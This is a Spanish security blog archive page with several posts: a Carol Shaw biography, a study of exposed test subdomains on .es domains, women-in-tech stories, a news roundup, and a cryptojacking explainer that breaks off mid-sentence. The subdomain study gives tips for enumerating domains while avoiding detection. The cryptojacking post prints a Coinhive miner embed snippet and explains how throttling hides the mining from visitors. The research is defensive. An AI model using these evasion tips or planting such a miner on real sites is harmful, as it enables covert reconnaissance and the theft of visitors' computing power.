Ilustración realizada por Catalina Guzmán "Out the way world, I've got my sassy pants on today". Carol Shaw Para Carol Shaw jugar a los videojuegos era su forma de divertirse usando el ordenador. Por eso, quiso dedicarse profesionalmente a ello. Esta decisión la llevó a trabajar en Atari, compañía pionera en juegos de arcade que la convirtió en la primera mujer diseñadora y programadora de videojuegos. Biografía Carol nació en 1955 en Palo Alto, California. Durante su etapa en el colegio su profesor de Matemáticas le asignó escribir un programa para hacer cálculos básicos. Con este proyecto, Shaw descubrió su interés por la Informática. Carol, estudió en la Universidad de California, Berkeley, donde desarrolló un Máster en Ingeniería Eléctrica y en Ciencias de la Computación, graduándose en 1977. Shaw inició sus primeros pasos profesionales en Atari como ingeniera microprocesadora de softwares. La metodología de trabajo que utilizaban en Atari era muy tediosa ya que primero escribían el código en un folio y luego lo transcribían al ordenador. A pesar de esto, Carol no abandonó su pasión por programar. Además, durante esta época, la oficina estaba integrada principalmente por hombres, una realidad que no era nueva para ella ya que en la universidad también había muy pocas chicas. Por el hecho de ser mujer, el presidente de la compañía, Rau Kassar, le atribuyó la tarea de decorar los interiores de las casas y carcasas de los juegos. Aunque Shaw se rebeló contra este estereotipo, aceptó diseñar los videojuegos, dándose cuenta de la necesidad de la diversidad de talento para sacar adelante un proyecto. Durante su tiempo aquí, Shaw programó el juego de X-O en 3D, Damas y Super Breakout. Carol saltó de Atari a Tandem donde solo estuvo 16 meses.Tras recibir una llamada de Al Miller, decidió formar parte de Activision, empresa reconocida como la primera en publicar softwares de videojuegos de empresas terceras. Durante su época aquí, en 1982, Shaw lanzó su juego River Raid. Éste consistía en una nave central situada en la parte baja de la pantalla que disparaba a naves atacantes que bajaban mientras la pantalla avanzaba. El juego fue un éxito y ganó el respeto y admiración de sus compañeros. Tras su paso por Activision, Carol regresó a Tandem ya que el estrés hizo que ya no disfrutara de lo que hacía. Aquí se dedicó a construir ordenadores para programas de aviación y la Bolsa de Valores de Nueva York. Después de seis años en esta empresa, Shaw tomó la decisión de jubilarse. ¿Qué opinas sobre la brecha de género que hay en el sector tecnológico? ¡Déjanos tu comentario! Lee el resto de posts de la serie homenaje de mujeres que han creado un hito en la historia STEM: » Sheryl Sandberg: COO de Facebook y creadora del movimiento "Lean In" » Susan Kare: una pionera e influencia en la iconografía digital » Dorothy Vaughan: matemática y primera manager afroamericana de la NASA » Jude Milhon: defensora pionera de los ciberderechos » Grace Murray Hopper: Inventora del COBOL y del término "bug"
27 de diciembre de 2017
Entornos de test públicos: un pequeño análisis de las (malas) prácticas en España
Todo entorno de programación serio requiere un entorno de prueba en el que poder verificar si el desarrollo de nuevas funcionalidades se ha realizado de forma correcta. Si nos ceñimos a la web, no es complicado encontrar ambientes de producción como podrían ser www.elevenpaths.com, y otro de desarrollo donde "experimentar", que bien podría ser test.elevenpaths.com. Imaginemos que estos subdominios no quedan bien restringidos por alguna razón, y se exponen públicamente. El riesgo es obvio: son entornos de desarrollo, pruebas... por definición, sujetos a fallos, errores o incluso a mostrar "las vergüenzas" de una página. Sin embargo, ¿existe alguna forma de detectar estos sub-dominios de pruebas? ¿Es común exponerlos? ¿Cuáles son los prefijos más comunes para identificar estos entornos de desarrollo en España? Vamos a averiguarlo. Detectando dominios de desarrollo Existen varias formas de identificar nombres de dominio: desde tratar de escanear directamente el supuesto activo para identificar los servicios abiertos, hasta preguntar por el dominio al servidor DNS, que es el encargado de proporcionar la relación entre nombre de dominio e IP. Si la prioridad es no ser detectado por el propietario del dominio, la mejor opción es evitar escaneos directos contra el activo y consultar a un servidor DNS confiable si existe un nombre de dominio. Para ello, pueden utilizarse herramientas como 'nslookup' que pueden ser ejecutadas tanto en local como en remoto a través de servicios online gratuitos. Sin embargo, de cara a ocultar la actividad y no ser identificado como una amenaza de denegación de servicio frente al equipo de monitorización del servidor DNS, es importante no realizar demasiadas peticiones en poco tiempo. Por ello, si queremos descubrir los dominios de prueba disponibles en el menor número de peticiones posibles y con mayor probabilidad de éxito, un buen diccionario de sub-dominios de desarrollo será el mejor aliado. Ejemplo de página en producción y de test Subdominios de prueba más utilizados en España Para poder elaborar un diccionario acertado de subdominios de desarrollo que utilicen el TLD (Top Level Domain) .es, se puede localizar un buen número de dominios a través de listados de posicionamiento de sitios web como Alexa o Majestic. En esta ocasión, tras descargar un millón de registros, se han extraído aquellos dominios cuyo TLD sea .es. Hemos encontrando 7.454 sitios web con TLD español. Para poder evaluar los más de 7.000 dominios .es, se ha diseñado un diccionario de 120 combinatorias que contiene términos como: backup, dev, prueba1, prueba2, test, testlogin, etc. A la hora de comprobar los dominios, se ha fraccionado el volumen de consultas para evitar ser identificado como actividad sospechosa; espaciando en un tiempo variable las casi 900.000 consultas necesarias. Además, es posible reducir el número de peticiones significativamente si se detecta que el dominio acepta cualquier subdominio como válido ( wilcard DNS record). Esto se puede comprobar solicitando la IP asociada a un subdominio que se sepa o sea muy improbable que exista. Al finalizar las consultas, filtrar los datos y cuantificar los resultados, se puede determinar que un 18 % (1.387) de los sitios analizados contienen, al menos, un subdominio de desarrollo expuesto en Internet. Veamos en profundidad algunas de sus características. El 71 % de estos subdominios de desarrollo apuntan a direcciones IP diferentes a la del dominio principal. Respecto al diccionario de posibles entornos de desarrollo en dominios .es, se reduciría el número de posibles valores de 120 a 42 combinatorias. Los siguientes subdominios son los más utilizados: Por supuesto, aclarar que no todas tienen por qué suponer un fallo de seguridad. Detengámonos en este asunto. Quisimos comprobar, no sólo cuales disponían de subdominio de prueba, sino además, cuántas están realmente protegidas. Para ello, realizamos consultas HTTP y HTTPS a estos subdominios y tuvimos en cuenta cuántos dominios se encuentran "correctamente protegidos". Esto implicaba: Protección de ambos servicios (HTTP y HTTPS) en el subdominio concreto dedicado al testing. Protección por autenticación (la respuesta del servidor web es un 200 con panel de login, 403, 530, 3XX... etc). Bajo estos criterios , 473 dominios cumplían las condiciones. O lo que es lo mismo, aproximadamente un 34 % de los dominios que cuentan con algún subdominio expuesto del tipo "testing", protege estos entornos tanto con TLS como por redirección/autenticación de manera adecuada. Si relajamos un poco las condiciones, y "obviamos" la coherencia HTTP/HTTPS, el número asciende a 838. Caso especial Durante la investigación ha sido posible encontrar algunos casos que no tenían una explicación lógica a priori, pero que han resultado ser interesantes de cara al estudio de estos entornos de desarrollo. En concreto, 35 de los subdominios detectados están asociados a una IP privada como, por ejemplo, 192.168.63.1. Esta actividad puede ser útil (aunque no sabemos si lo más acertado) para el desarrollador. En ocasiones, de cara a realizar pruebas, es más cómodo poder hacer peticiones a un nombre de dominio concreto y redirigir la petición al servidor interno de la red privada que aloja el servicio web. Si en el futuro cambia la IP del servidor interno, sólo hay que cambiar el registro DNS, no hace falta modificar ningún desarrollo de prueba. Aunque lo cierto es que no parece ser lo más adecuado publicar este registro en servidores DNS públicos. Se expone información sobre direccionamiento interno de la compañía. Además este tipo de prueba se podría realizar igualmente con mínimo esfuerzo desde la red privada. Riesgos de la exposición Podría llegar a ser discutible si estos dominios deberían estar o no expuestos en Internet. En algunos casos puede intentar estar justificada para realizar pruebas de acceso externas (aunque no parece que pueda estar nunca justificada una exhibición masiva y pública, existiendo sencillos métodos de restricción de acceso) y en otros casos tratarse de un descuido que puede salirle caro a una compañía. Algunos de los riesgos identificados al mostrar estos dominios en Internet n o distan mucho de los riesgos habituales de una web, solo que con el potencial agravante de encontrarse en un entorno precisamente caracterizado por situarse en una etapa de desarrollo anterior y, por definición, menos madura que la de producción. Acceso a datos confidenciales: Si el dominio de prueba obtiene datos de la misma base de datos que el dominio de producción y presenta vulnerabilidades (tipo SQLi) que fueron corregidas en el servidor web de producción pero no en el de desarrollo, podría suponer un vector de ataque para el robo de datos sensibles. Acceso a red corporativa: Si el dominio de desarrollo no ha sido asegurado correctamente y presenta vulnerabilidades que permitan la ejecución arbitraria de código remoto, un atacante podría tomar el control de la máquina y, entre otras opciones, servir como punto de acceso a la red corporativa o infectar otros equipos en la misma subred. Daños contra la reputación de la compañía: Sobre todo en el caso de grandes empresas con alta reputación y cotización en bolsa, la noticia sobre un defacement, aunque sea sobre un dominio de prueba, puede virilizarse en poco tiempo y ser perjudicial para la confianza de sus inversores o clientes. Por tanto, si es necesario exponer un dominio de este tipo a Internet debería hacerse siguiendo unas recomendaciones: No utilizar nunca datos reales para realizar las pruebas. Aislar el dominio de pruebas de cualquier otro activo que permita el acceso a datos reales. Determinar la temporalidad de las pruebas, filtrar el acceso a usuarios autenticados y bloquear el acceso al subdominio de desarrollo cuando se hayan finalizado las pruebas. Incluir el subdominio en el parque de activos de la compañía y aplicar, siempre que sea posible, las mismas medidas de seguridad que a un servidor de producción o mitigando el riesgo de exposición frente a nuevas vulnerabilidades que sean descubiertas en las tecnologías utilizadas por el servidor de desarrollo. Monitorizar de manera constante la posible aparición de subdominios de este tipo sin el consentimiento de la compañía. Sobre todo, si no se ha incluido un registro DNS Wildcard (*.elevenpaths.com) que impida la detección de subdominios de desarrollo a través de consultas por diccionario de términos comunes al registro de nombres de dominio. Samuel Dugo Flores Mariano González Telefónica Advanced Global SOC con la colaboración de Innovación y Laboratorio
25 de diciembre de 2017
Historias de #MujeresHacker: Ivonne Pedraza, experta en Seguridad de la Información de Telefónica
Esta semana presentamos la historia de Ivonne Pedraza que, cómo Cyber Security Business Development, vive con dedicación su trabajo dentro del mundo tecnológico. Hoy nos cuenta sus motivaciones, consejos y experiencia en el sector STEM. Ivonne Pedraza, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: Soy Ingeniera Electrónica, y por eso durante mi carrera, he recibido sobrenombres como "pelacables" o "arregla-planchas". Comencé trabajando en comunicaciones y estuve a cargo de un proyecto que tenía que ver con la implementación de un antivirus y fue lo que me abrió las puertas al mundo de la Seguridad. Durante el 2008, formé parte de una de las empresas más representativas del mercado en Colombia en el sector de la Seguridad, que estaba buscando jóvenes profesionales con algo de experiencia para recibir entrenamiento y conseguir formar parte del staff. En esta etapa e mpecé a conocer de cerca las marcas, dando soporte e implementando equipos de Seguridad Informática de perímetro. En este punto debo agradecer a mi compañero Eduardo Hurtado por tener la paciencia, el tiempo y las palabras necesarias para enseñarme todo lo que debía hacer para responder ante las necesidades del cliente, ya que de nuestras acciones dependía la seguridad de clientes Gubernamentales y Entidades Bancarias. Fue una etapa muy bonita, aprendí demasiado, conocí muchas empresas, diferentes arquitecturas y diferentes soluciones a medida. En 2011 empecé mi expertise en la Seguridad de la Información trabajando en una Entidad Bancaria. En mi día a día, debía gestionar proyectos de actualización de plataformas, identificando las necesidades del banco. Recuerdo uno de los momentos en los que propuse certificar el proceso de tecnología en ISO27000 y mi sorpresa fue grata cuando vi que apoyaron el proyecto, consiguiendo que durante ese tiempo pudiera aprender sobre gestión de sistemas de Seguridad SGSI, GAP, normas, etc. Después, con esa buena experiencia en el sector bancario y los SGSI, me llegó una oferta para trabajar en una empresa de infraestructura vial del mismo holding bancario, que tenía un sistema de control de túneles (SCADA) y debían cumplir por normativa SOX todos los controles de seguridad. Durante esta etapa construí todo el modelo de seguridad y lo implementé en el SCADA y el sistema de PEAJES. Para mí, éste ha sido uno de los retos más grandes, en el que tuve que aprender sobre construcciones y conocer la cultura organizacional del sector de infraestructura vial combinado con políticas SOX. Actualmente, trabajo en la unidad de Desarrollo de Negocio Digital para el área de Seguridad en Telefónica Colombia, donde tengo la oportunidad de estar a la vanguardia tecnológica, dando apoyo a la fuerza comercial en el desarrollo de nuevas oportunidades de negocio, para entregar a los clientes soluciones adecuadas a sus necesidades. Además, en este área puedo desarrollar mis habilidades de gestión frente a todos los procesos que enfrentamos internamente día a día. Como siempre, en el camino uno se encuentra con personas que son obstáculos y otras que nos favorecen, pero a cada una de ellas les agradezco su aportación. Al principio de mi carrera, era muy joven para las responsabilidades que tenía y además me encontraba en un sector dominado por hombres en el que nadie creía en mi criterio, pero eso hizo que me esforzara en hacer las cosas mejor. Ahora cuento con reconocimiento y sigo preparándome. En mi carrera y en el mundo tecnológico, mi estrategia siempre ha sido dejar que “hablen” para que finalmente, se acaben dando cuenta de lo que soy capaz. Ivonne Pedraza Díaz Cyber Security Business Development Movistar Colombia @ivonnnep Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica
22 de diciembre de 2017
Girls Inspire Tech #GIT2017: el laboratorio tecnológico de CDO para hijas de empleados de Telefónica
Desde Telefónica creemos que para crear tecnología hay que tener pasión por hacerlo, y no debe existir ninguna correlación entre género y ocupación. Por eso, el sábado 16 de diciembre celebramos el evento Girls Inspire Tech #GIT2017, una iniciativa liderada por las #MujeresHacker que trabajan en Telefónica CDO, la unidad de Chief Data Office (CDO), liderada por Chema Alonso, que integra Aura, -Inteligencia Cognitiva-, ElevenPaths, -Ciberseguridad-, LUCA, -BigData- y Cuarta Plataforma. Durante la jornada, nuestras mini-hackers compartieron una mañana llena de tecnología e inspiración con charlas, juegos, experimentos y concursos…muy tech. Todo lo que pasó en Girls Inspire Tech #GIT2017 El taller comenzó con la bienvenida de Elena Gil, CEO de LUCA, quién nos recordó junto a Chema Alonso, Chief Data Officer de Telefónica, que la tecnología es divertida y que no es una profesión que tenga ninguna discriminación por el género. Todas las que queráis animaros a trabajar en tecnología podéis hacerlo si realmente es lo que queréis. Charlas, juegos y experimentos Durante la charla de Marina Bezares y Yaiza Rubio de ElevenPaths, recordaron que en el ámbito de Ciberseguridad, la seguridad 100 % no existe. También propusieron al grupo de chicas asistentes, retos relacionados con la técnica de la Esteganografía, bulos en Internet y la facilidad de realizar ataques de phishing. A continuación, Elena Diaz, Data Scientist de LUCA, explicó la importancia de los datos en el día a día y cómo la tecnología del Big Data nos ayuda a tomar decisiones en base a los datos. También, nuestras #MujeresHacker de Aura: Mariló Vallecillo, Marta Pérez y Ángela Vázquez contaron cómo ha evolucionado la Inteligencia Artificial desde los tiempos de Elisa hasta la actualidad. Para finalizar, Paula López e Isabel Menéndez, Data Scientists de la 4ª Plataforma, explicaron cómo un ordenador puede reconocer una cara utilizando biometría y algoritmos, tecnología conocida con el nombre de reconocimiento facial. » Los mejores momentos de Girls Inspire Tech #GIT2017 En la sesión de juegos y experimentos, las niñas vieron cómo, de forma sencilla, se puede realizar un plotter vertical y pintar dibujos en papel con un Arduino, cuyas piezas habían sido creadas con una impresora 3D. Además, probaron una máquina de caramelos que permitía la autenticación mediante la solución de firma Sealsign de ElevenPaths. Posteriormente, Ana Isabel Molina explicó cómo funciona el razonamiento de Aura, a través de un juego de cartas en el que las participantes hicieron equipos, y en cadena, trasladaron los mensajes que interpretaban progresivamente para sacar un única acción final. Además, Julia Llanos, presentó Aura a las niñas y éstas le hicieron todo tipo de preguntas como: ¿eres hombre o mujer? ¿tienes novio? ¿me cantarías una canción? dando respuestas cómo si fuera una amiga más. Otra de las pruebas fue Akinator, el genio de la lámpara, que con la gestión de los datos consiguió adivinar cualquier personaje imaginado. Por último, finalizamos el evento con Kahoot, un concurso de preguntas y respuestas sobre las charlas recibidas durante la mañana. En él pusimos a prueba a las chicas para saber quién había aprendido más a lo largo de la jornada y premiamos a las primeras que contestaron correctamente y en el menor tiempo posible. Desde Telefónica queremos impulsar la diversidad y avivar el sueño de las niñas que desean ser programadoras, matemáticas e ingenieras, para que sean conscientes de su potencial. Ellas con nuestro apoyo definirán la tecnología del futuro. Gracias a las #MujeresHacker que trabajan en Aura, ElevenPaths, LUCA y la Cuarta Plataforma por inspirar a las más jóvenes en Girls Inspire Tech #GIT2017. Estate atento y síguenos en nuestras redes sociales: @Telefonica @ElevenPaths @LUCA-D3
20 de diciembre de 2017
#CyberSecurityPulse: El boom de los minadores JavaScript
La pregunta más recurrente estos últimos meses derivado del repunte en el valor de numerosas criptodivisas es: ¿Invierto o no invierto? Sin embargo, como sabemos, existen diferentes formas de obtener criptodivisas y, una de ellas, es a través del minado. Una opción cada vez más costosa desde el punto de vista de los gastos incurridos para llevarlo a cabo. Es en este punto cuando sale a relucir la picaresca de ciertos atacantes. Investigadores de seguridad de F5 Networks han detectado una campaña de malware, denominada como Zealot, dirigida a servidores Linux y Windows para instalar mineros de Monero. Los expertos observaron que los threat actors trataban de escanear Internet en busca de servidores particulares no parcheados y los comprometían con dos exploits, uno para Apache Struts (CVE-2017-5638) y otro para el CMS DotNetNuke ASP.NET (CVE-2017-9822). Otro caso reciente ha sido el detectado en el Starbucks de Buenos Aires donde los equipos de los clientes que se contectaban a su Wi-Fi comenzaban a minar de forma secreta. La notificación a la compañía fue realizada por el CEO de Stensul, Noah Dinkin, quien realizó el pasado 2 de diciembre una conculta a través de Twitter de si estaban al tanto de la situación. Dinkin comentaba en su tweet que se estaba utilizando el minero JavaScript que ofrece Coinhive para minar la criptodivisa Monero. En este sentido, ElevenPaths ha publicado recientemente en su blog una investigación en la que se explica por qué se apuesta actualmente por minar Monero y no Bitcoin, así como cuáles son las webs más atractivas para aquellos que quieren aprovecharse de la capacidad de cómputo de terceros. Ante esta situación, se han publicado recientemente proyectos, como por ejemplo el de la extensión NoCoin para detectar si tu equipo se encuentra minando. Sin embargo, estos esfuerzos todavía son insufientes. Más información en ElevenPaths Noticias destacadas FCC acaba con la neutralidad de la red 3 de cada 5 reguladores federales votaron el jueves pasado para controlar el futuro de Internet por parte de las compañías de cable y telecomunicaciones estadounidenses, dándoles poderes para acelerar el servicio de sitios web o ralentizar a otros. Como se propuso este verano, la Comisión Federal de Comunicaciones (FCC) de Estados Unidos ha retirado las reglas de neutralidad de red que requieren que los proveedores de servicios de Internet (ISP) traten todos los servicios y sitios web por igual y les prohíbe bloquear sitios o cobrar por un servicio de mayor calidad. Más información en The Hacker News El Pentágono retrasa la fecha para que los proveedores militares cumplan con las normas de ciberseguridad El Pentágono retrasará la fecha límite del 1 de enero para que todos sus proveedores cumplan con una serie de nuevas regulaciones diseñadas en gran medida para proteger mejor los datos militares. Para el final del año, las empresas deben simplemente mostrar que tienen un plan establecido para cumplir con la regulación destinada a evitar el robo de datos confidenciales. Esta medida viene después de que en octubre, los funcionarios de Estados Unidos reconocieran que información confidencial del F-35 Joint Strike Fighter de un proveedor militar australiano fue robada. Más información en NextGov Noticias del resto de la semana Evento sospechoso enruta el tráfico de webs importantes a través de Rusia El tráfico enviado hacia y desde Google, Facebook, Apple y Microsoft fue brevemente enrutado a través de un proveedor de Internet ruso previamente desconocido el miércoles en circunstancias que los investigadores dijeron que era sospechoso e intencional. El incidente, que involucra al protocolo de Internet Border Gateway, es el más reciente que plantea preguntas preocupantes sobre la confianza y la confiabilidad de las comunicaciones. El evento del miércoles se produce ocho meses después de que parte del tráfico de red pertenecientes a MasterCard, Visa y más de dos docenas de otros servicios financieros fueran enviados a través de una telco controlada por el gobierno ruso, también bajo circunstancias sospechosas. Más información en Ars Technica Dos 0-days descubiertos en el vBulletin Forum divulgados públicamente Investigadores han descubierto dos vulnerabilidades críticas en una plataform de vBulletin que podrían permitir a un atacante de forma remota ejecutar código malicioso en la última versión del servidor de aplicaciones vBulletin. La primera vulnerabilidad se trata de un problema relacionado con la inclusión de archivos, lo que permitiría a un atacante que de forma remota pudiera incluir cualquier archivo en el servidor de vBulletin y ejecutar código PHP arbitrario. La segunda vulnerabilidad descubierta, que se le ha asignado el CVE-2017-17672, se describe como un problema de deserialización donde un atacante no autenticado puede aprovechar para eliminar archivos arbitrarios e incluso ejecutar código malicioso "en determinadas circunstancias". Más información en The Hacker News Un gestor de contraseñas preinstalado en Windows 10 permitiría robar contraseñas A partir de Windows 10 Anniversary Update (Versión 1607), Microsoft agregó una nueva característica llamada Content Delivery Manager que instala nuevas aplicaciones sugeridas sin pedir permiso a los usuarios. Según el post publicado en el blog de Chromium el pasado viernes, el investigador Tavis Ormandy alertó de haber encontrado un famoso gestor de contraseñas preinstalado llamado Keeper en su Windows 10, que descargó directamente de Microsoft Developer Network. Posteriormente, Ormandy descubrió una vulnerabilidad crítica que conduce a un "compromiso total de la seguridad de Keeper, lo que permitiría que cualquier sitio web robe cualquier contraseña". Más información en The Hacker News Otras noticias Tritón, el nuevo malware que ataca a sistemas industriales Más información en FireEye El nuevo objetivo de Lazarus APT Group, compañías de criptomonedas de Londres Más información en Security Affairs Script en Python que recupera registros de eventos ocultos Más información en Github ¡Regístrate a la newsletter!
19 de diciembre de 2017
Guerra abierta para evitar la minería no autorizada de criptodivisas cuando navegamos
Un reciente informe de CheckPoint señalaba hace unas semanas que las aplicaciones que utilizaban la CPU de los usuarios para minar la criptodivisa Monero supusieron la sexta amenaza más importante del mes de octubre. Este repunte tiene lugar semanas después de que se empezara a identificar sitios web de tráfico relevante que ponen en práctica este método de financiación alternativo. Pero, ¿entendemos lo que conlleva la proliferación de este tipo de prácticas? ¿Qué es la minería en el ámbito de las criptodivisas? El proceso de minería es una tarea propia de la tecnología Blockchain. En Bitcoin, por ejemplo, se utiliza para distribuir aleatoriamente entre los nodos de la red el privilegio de añadir un nuevo bloque de transacciones a la cadena de bloques y, por tanto, de recibir la recompensa por ese trabajo. La tarea de minería consiste en hashear la serie de datos de entrada que se incorporarán en el bloque hasta dar con un hash con unas características muy concretas: que empiece por un determinado número de ceros. El primer nodo en conseguirlo, añadirá este nuevo bloque y se pondrá a trabajar en el siguiente bloque tras informar al resto de la red de que lo ha conseguido. Si los nodos trabajaran de forma aislada ( solo-mining) las posibilidades de conseguir añadir un bloque recaerán en la suerte: tendrán más posibilidades de encontrar un hash con esas características cuanto mayor sea su capacidad para generarlos. Es por eso que en la jerga de las criptodivisas se suele hablar de cifras como hashes por segundo (H/s), kilohashes por segundo (miles de hashes por segundo, KH/s) o megahashes por segundo (millones de hashes por segundo). Un equipo doméstico sin personalizar, podría realizar operaciones de este tipo a velocidades de 50-100 megahashes por segundo. Por tener una referencia, la capacidad de cómputo actual de la red de Bitcoin ronda los 13.000 millones de gigahashes por segundo, lo que haría que minando de forma aislada con una capacidad de un gigahash por segundo, las posibilidades de ser el agraciado del próximo turno sería de una entre 13 000 millones (1/13.000.000.000) cada diez minutos. Figura 1. Tasa de hashes por segundo de la red de Bitcoin desde 2009 hasta diciembre de 2017. Fuente: blockchain.info. Por este motivo, los mineros no suelen minar solos sino que se alían con otros mineros en lo que se conocen como pools de minería con el fin de minimizar el impacto del factor suerte y poder al menos recaudar una parte del trabajo realizado. En estos pools, la carga de trabajo se reparte entre diferentes personas que contribuyen entre sí. El administrador del pool gestiona la carga de trabajo entre sus workers y se encarga de llevar a cabo las tareas de reparto y distribución de los beneficios, a cambio, eso sí, de comisiones que pueden rondar entre menos del 1% y el 30% en función del pool y de la criptodivisa que se mina. Precisamente por estos motivos, la minería tiene un gasto energético elevado. Una estimación reciente del consumo anual de la red de Bitcoin ya superaba el consumo de 159 países del mundo, de acuerdo a un estudio realizado por Digiconomist en base a las estimaciones actuales de energía necesaria para el mantenimiento de la red de Bitcoin. Ese coste energético para mantener las máquinas funcionando tiene que ser afrontado por los propios mineros en sus máquinas y puede llegar a ser superior al beneficio dependiendo del país y de la tarifa energética. Sin embargo, algunos optan por el camino corto. ¿ Cómo reducir la tarifa energética a la que hacer frente? Una de las opciones es el uso de los ciclos de computación sin consentimiento del usuario. La existencia de esta amenaza como tal no es nueva y son varias las familias de malware que ya han intentado explotar esta forma de monetizar la infección incorporando capacidades de minería a los binarios maliciosos. Más recientemente se ha optado por otra opción. Utilizar el navegador como herramienta de minado e incorporar código Javascript que se encargue de esas tareas. Sin embargo, la capacidad de cómputo de una pestaña de navegador no es comparable con la que se podría alcanzar con hardware ad-hoc. ¿Por qué utilizar entonces Monero y no Bitcoin? La apuesta por Monero y no por Bitcoin El algoritmo de Proof-of-Work implementado por Bitcoin se centra en la realización de operaciones de hashing utilizando SHA256 lo que ha incentivado la aparición de hardware de minería muy especializado con dispositivos diseñados ad-hoc para optimizar ese proceso. Sin embargo, en el caso de Monero el peso de una CPU en el algoritmo utilizado para la prueba de trabajo (Cryptonight) es mucho más importante dado que necesita, al menos, dos megas de memoria RAM para funcionar, lo que encarece sustancialmente la creación de hardware muy especializado en este algoritmo y, como consecuencia, hace que el minado con hardware convencional siga siendo una práctica rentable. Fruto de esta posibilidad, surgen diferentes librerías que pretenden atajar este nicho en el que la minería por CPU sigue siendo rentable. Los sitios web de coinhive.com o crypto-loot.com ofrecen pequeñas porciones de código Javascript. Ambos proyectos se presentan como una alternativa a la publicidad para la monetización de contenidos web aprovechando la capacidad de cómputo de los usuarios que visitan la web. Aunque las dos plataformas ofrecen la posibilidad de preguntar al usuario si desea ceder parte de su capacidad de cómputo a los usuarios, esta opción es opcional con lo que muchos usuarios podrían estar minando con el mero hecho de empezar a visitar la web. Para un administrador, añadir esta funcionalidad es sencillo. En el caso de Coinhive, basta con añadir la librería de «coinhive.min.js» en el sitio web en donde se quiera que el usuario contribuya minando (o «authedmine.min.js», que solicita el permiso explícito del usuario como hacen plataformas como hashkiller.co.uk por ejemplo) e invocar el proceso «miner.start()» para que comience. https://coinhive.com/lib/coinhive.min.js <script> var miner = new CoinHive.Anonymous('YOUR_SITE_KEY', {throttle: 0.3}); miner.start(); </script> Estos minadores ofrecen la posibilidad de fijar la cantidad de CPU destinada a las labores de minería. En el caso de Coinhive para no llamar la atención del usuario bloqueando su equipo se pueden fijar límite máximos al uso de la CPU modificando el valor opcional throttle. También en ambos casos es necesario incluir un token en la llamada que invoca el proceso que arranca la tarea de minería en sí misma. Ese token es un identificador de a qué minero se le asignará la capacidad de cómputo de este usuario. Mediante este mecanismo las páginas que facilitan esa interfaz registran cuánta capacidad de cómputo está asociada a cada uno de sus colaboradores de cara a cargar en la cuenta correspondiente los beneficios correspondientes a su proceso de minado. Tanto Coinhive como Crypto-loot ofrecen plugins que se pueden incluir directamente en Wordpress con el objetivo de facilitar que un mayor número de webmasters opten por su solución. El hecho de que estos sitios web centralicen las peticiones podría ser un punto de riesgo para el anonimato de quienes desarrollen aplicaciones de minería no autorizada basadas en sus librerías. Sin embargo, estas plataformas permiten sin problemas el acceso vía Tor y el registro de cuentas incluso empleando correos desechables con lo que las expectativas de cara a conseguir una atribución real se reducen de forma significativa, incluso con la colaboración de las plataformas. En este sentido, las plataformas ofrecen estos servicios a cambio de una comisión en concepto de gestión. En el caso de coinhive.com, se reservan el 30 % de la capacidad de cómputo según los propios términos y condiciones y en el caso de crypto-loot.com, las comisiones ascienden hasta el 12 %. Por este motivo, sigue siendo un negocio provechoso para los propios administradores de estas plataformas que además retienen una comisión extra en el momento en el que los mineros solicitan el pago a su propia cuenta de Monero. Los ficheros, sin embargo, no tienen por qué ser cargados desde las páginas oficiales. A continuación se facilita información adicional sobre los ficheros en cuestión, tomando como referencia la información disponible en VirusTotal. En este sentido, Monero presenta otra ventaja para aquellos mineros que usen la capacidad de cómputo de la CPU y es que ha sido concebida para ser una criptodivisa anónima. En Monero, a diferencia de en Bitcoin o Litecoin, no se puede rastrear el saldo de una cuenta ni a qué otra cuenta se transfiere cada moneda. De esta manera, facilita también a los atacantes el proceso de anonimización al estar utilizando ya una criptodivisa que contempla el anonimato desde su propio diseño. Las pestañas donde el usuario pasa más tiempo son las más atractivas… pero no las únicas Por este motivo, los espacios más interesantes para incentivar el minado no autorizado son sitios web en los que la pestaña del usuario vaya a permanecer mucho tiempo abierta. En primer lugar, para que la carga del código Javascript de minado solo se efectúe una vez y, en segundo lugar, para mantener abierto el proceso de minado el mayor tiempo posible. Especialmente interesantes son los sitios de reproducción de contenidos audiovisuales. Tanto si se trata de contenidos pregrabados como contenidos emitidos en directo como emisiones pirata de partidos de fútbol y otros eventos deportivos que, por su duración, pueden llegar a concentrar a miles de usuarios simultáneamente durante varias horas. Si nos centramos en el listado de los sitios más populares para Alexa, nos empezamos a encontrar sitios web que utilizan esta librería como mejortorrent.com, página 1.192 según Alexa a fecha de edición de este blog y que ya incorporaba el script de minería de Coinhive desde, al menos, el 11 de diciembre de 2017, como se podía comprobar en The Wayback Machine aquí. Por cierto, al no indicar valor de throttle, el proceso de minado en esta web alcanzaba el 100 % de CPU. Figura 2. Captura de pantalla del primer snapshot archivado por The WayBack Machine en el que mejortorrent.com emplea el minador de coinhive.com. Una búsqueda en Shodan de las cadenas de texto vinculadas al minero ha facilitado una gran cantidad de resultados, algunos de ellos vinculados, por ejemplo, con páginas de distribución de contenidos pornográficos, especialmente audiovisuales. Si realizamos la misma búsqueda de páginas que carguen el archivo «coinhive.min.js» en censys.io, los resultados ascienden a 1.634, 897 de los cuales se encuentran entre el millón de dominios más populares en la red. Si ponemos el foco en el top 10000 de páginas hay al menos 9 sitios web que incluyen el script de «coinhive.min.js» literalmente. Además de la mencionada mejortorrent.com, se encuentran kickass.cd (compartición de archivos torrent), nnrdntrrjf.bid, shareae.com (sobre edición de contenidos multimedia), moonbit.co.in (un faucet de bitcoins que divide en dos Javascript diferentes el script de minería), sitios web de noticias como livetechnologynews.com (archivada aquí) y otras de compartición de contenidos audiovisuales relacionados con el anime y la distribución de películas. Figura 3. Resultados identificados en censys.io que incluyen una referencia a la cadena de texto de «coinhive.min.js». Usando una búsqueda un poco más amplia, incluyendo las cadenas «miner.min.js» o «miner.start()» , el número de resultados asciende ligeramente, pero con resultados preocupantes. Un ejemplo de ello es el sitio web thepiratebay.red (no confundir con piratebay.red, que también carga un script de minería, pero proveniente de coinhive.com). Figura 4. Carga de un fichero de minado externo realizada en el sitio web thepiratebay.red. El sitio web pudo ser identificado gracias a la presencia de la cadena de texto «miner.start()». Web archivada manualmente en The 